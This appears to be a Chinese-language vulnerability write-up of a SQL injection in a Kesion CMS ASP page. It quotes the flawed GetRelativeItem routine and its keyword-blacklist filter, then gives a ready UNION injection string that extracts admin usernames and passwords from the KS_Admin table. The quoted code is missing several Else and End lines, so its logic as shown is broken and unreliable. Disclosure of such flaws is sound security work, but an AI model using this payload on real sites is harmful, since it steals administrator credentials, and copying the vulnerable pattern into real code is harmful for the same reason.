

Dim KS:Set KS=New PublicCls

Dim Action


Select Case Action

Case "Ctoe" CtoE

Case "GetTags" GetTags

Case "GetRelativeItem" GetRelativeItem //问题函数


Case "getonlinelist" getonlinelist

End Select

Sub GetRelativeItem() //漏洞函数开始

Dim Key:Key=UnEscape(KS.S("Key"))//漏洞位置,只调用ks.s函数,无其它过滤。

Dim Rtitle:rtitle=lcase(KS.G("rtitle"))

Dim RKey:Rkey=lcase(KS.G("Rkey"))

Dim ChannelID:ChannelID=KS.ChkClng(KS.S("Channelid"))

Dim ID:ID=KS.ChkClng(KS.G("ID"))

Dim Param,RS,SQL,k,SqlStr

If Key<>"" Then

If (Rtitle="true" Or RKey="true") Then

If Rtitle="true" Then

param=Param & " title like '%" & key & "%'"//类似搜索型注入漏洞。

end if

If Rkey="true" Then

If Param="" Then

Param=Param & " keywords like '%" & key & "%'"


Param=Param & " or keywords like '%" & key & "%'"

End If

End If


Param=Param & " keywords like '%" & key & "%'"

End If

End If

If Param<>"" Then

Param=" where InfoID<>" & id & " and (" & param & ")"


Param=" where InfoID<>" & id

end if

If ChannelID<>0 Then Param=Param & " and ChannelID=" & ChannelID

Param=Param & " and verific=1"

SqlStr="Select top 30 ChannelID,InfoID,Title From KS_ItemInfo " & Param & " order by id desc" //查询

Set RS=Server.CreateObject("ADODB.RECORDSET")

RS.Open SqlStr,conn,1,1

If Not RS.Eof Then


End If




Public Function S(Str)

S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))

Function DelSql(Str)

Dim SplitSqlStr,SplitSqlArr,I

SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"

SplitSqlArr = Split(SplitSqlStr,"|")

For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)

If Instr(LCase(Str),SplitSqlArr(I))>0 Then

Die "alert('系统警告!\n\n1、您提交的数据有恶意字符" & SplitSqlArr(I) &";\n2、您的数据已经被记录;\n3、您的IP:"&GetIP&";\n4、操作日期:"&Now&";\n Powered By Kesion.Com!');window.close();"

End if


DelSql = Str

End Function


注入语句:%') union select 1,2,username+'|'+ password from KS_Admin





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